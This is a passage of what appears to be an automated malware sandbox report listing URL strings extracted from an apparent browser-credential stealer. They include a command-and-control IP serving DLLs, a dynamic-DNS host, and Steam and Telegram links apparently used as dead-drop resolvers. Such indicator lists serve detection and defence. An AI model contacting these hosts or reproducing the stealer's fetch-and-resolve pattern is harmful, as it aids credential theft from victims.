Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreemen
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.16.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2467582948.000000006F8FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2440435533.0000000022AED000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434694305.000000001CB4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://116.203.165.127
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/freebl3.dllI
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/nss3.dllk
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/softokn3.dll)
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/softokn3.dlly
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/sqlp.dll
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/vcruntime140.dll2
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127/vcruntime140.dlln
Source: RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.203.165.127AK
Source: FCAAAA.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: FCAAAA.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FCAAAA.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FCAAAA.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Bh1h47R1I7Wg&a
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCs
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fIns
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=83YueuslRxGq&l=e
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 00000003.00000002.2429083892.0000000001611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cowod.hopto.org/
Source: RegAsm.exe, 00000003.00000002.2429083892.0000000001611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cowod.hopto.org/%r
Source: FCAAAA.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FCAAAA.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FCAAAA.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: JJDBGD.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2429083892.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/l
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2429083892.0000000001460000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 00000003.00000002.2429083892.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869h/
Source: file.exe, 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 00000003.00000002.2429083892.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869y/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.c
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: DHCAAE.3.dr	String found in binary or memory: https://support.mozilla.org
Source: DHCAAE.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DHCAAE.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434252843.000000001C54D000.00000004.00000020.00020000.00000000.sdmp, DGDBAK.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: DGDBAK.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
